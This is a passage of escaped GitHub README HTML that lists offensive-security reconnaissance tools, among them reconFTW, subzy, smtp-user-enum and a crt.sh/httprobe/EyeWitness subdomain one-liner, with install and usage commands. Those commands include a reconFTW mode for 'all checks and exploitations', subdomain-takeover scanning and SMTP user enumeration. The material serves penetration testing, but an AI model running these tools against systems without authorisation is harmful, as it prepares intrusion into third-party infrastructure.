class=\"pl-c1\"\u003e127.0\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e.0\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003e1\u003c/span\u003e:\u003cspan class=\"pl-c1\"\u003e5001\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLots of usage tutorial videos \u003ca href=\"https://asciinema.org/~spiderfoot\" rel=\"nofollow\"\u003ehere\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY\" alt=\"spiderfoot\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/smicallef/spiderfoot\"\u003ehttps://github.com/smicallef/spiderfoot\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/six2dez/reconftw\"\u003ereconftw\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-reconftw\" class=\"anchor\" aria-label=\"Permalink: 🔙reconftw\" href=\"#reconftw\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ereconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh\"\u003e\u003cpre\u003egit clone https://github.com/six2dez/reconftw.git\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e reconftw/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Single target domain\n./reconftw.sh -d target.com -r\n\n# One target with multiple domains\n./reconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n./reconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n./reconftw.sh -d target.com -a\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Single target domain\u003c/span\u003e\n./reconftw.sh -d target.com -r\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e One target with multiple domains\u003c/span\u003e\n./reconftw.sh -m target -l domains.txt -r\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Passive recon\u003c/span\u003e\n./reconftw.sh -d target.com -p\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Perform all checks and exploitations\u003c/span\u003e\n./reconftw.sh -d target.com -a\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage instructions see \u003ca href=\"https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs\" alt=\"reconftw\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.youtube.com/watch?v=TQmDAtkD1Wo\" rel=\"nofollow\"\u003ehttps://www.youtube.com/watch?v=TQmDAtkD1Wo\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PentestPad/subzy\"\u003esubzy\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-subzy\" class=\"anchor\" aria-label=\"Permalink: 🔙subzy\" href=\"#subzy\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSubdomain takeover tool which works based on matching response fingerprints from \u003ca href=\"https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md\"\u003ecan-i-take-over-xyz\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install -v github.com/PentestPad/subzy@latest\"\u003e\u003cpre\u003ego install -v github.com/PentestPad/subzy@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/PentestPad/subzy?tab=readme-ov-file#installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# List of subdomains\n./subzy run --targets list.txt\n\n# Single or multiple targets\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List of subdomains\u003c/span\u003e\n./subzy run --targets list.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Single or multiple targets\u003c/span\u003e\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA\" alt=\"subzy\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/\" rel=\"nofollow\"\u003ehttps://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/cytopia/smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-smtp-user-enum\" class=\"anchor\" aria-label=\"Permalink: 🔙smtp-user-enum\" href=\"#smtp-user-enum\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install smtp-user-enum\"\u003e\u003cpre\u003epip install smtp-user-enum\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"smtp-user-enum [options] -u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\"\u003e\u003cpre\u003esmtp-user-enum [options] -u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4\" alt=\"smtp-user-enum\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.kali.org/tools/smtp-user-enum/\" rel=\"nofollow\"\u003ehttps://www.kali.org/tools/smtp-user-enum/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003ecrt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\u003c/h3\u003e\u003ca id=\"user-content-crtsh---httprobe---eyewitness\" class=\"anchor\" aria-label=\"Permalink: 🔙crt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\" href=\"#crtsh---httprobe---eyewitness\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eI have put together a bash one-liner that:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003ePassively collects a list of subdomains from certificate associations (\u003ca href=\"https://crt.sh/\" rel=\"nofollow\"\u003ecrt.sh\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eActively requests each subdomain to verify it's existence (\u003ca href=\"https://github.com/tomnomnom/httprobe\"\u003ehttprobe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eActively screenshots each subdomain for manual review (\u003ca href=\"https://github.com/FortyNorthSecurity/EyeWitness\"\u003eEyeWitness\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \u0026quot;https://crt.sh/?q=${domain}\u0026quot; | pup 'td text{}' | grep \u0026quot;${domain}\u0026quot; | sort -n | uniq | httprobe \u0026gt; /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web\"\u003e\u003cpre\u003edomain=DOMAIN_COM\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003erand=\u003cspan class=\"pl-smi\"\u003e$RANDOM\u003c/span\u003e\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003ecurl -fsSL \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://crt.sh/?q=\u003cspan class=\"pl-smi\"\u003e${domain}\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e pup \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003etd text{}\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e grep \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e${domain}\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sort -n \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e uniq \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e httprobe \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e /tmp/enum_tmp_\u003cspan class=\"pl-smi\"\u003e${rand}\u003c/span\u003e.txt\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_\u003cspan class=\"pl-smi\"\u003e${rand}\u003c/span\u003e.txt --web\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eNote: You must have \u003ca href=\"https://github.com/tomnomnom/httprobe\"\u003ehttprobe\u003c/a\u003e, \u003ca href=\"https://github.com/EricChiang/pup\"\u003epup\u003c/a\u003e and \u003ca href=\"https://github.com/FortyNorthSecurity/EyeWitness\"\u003eEyeWitness\u003c/a\u003e installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 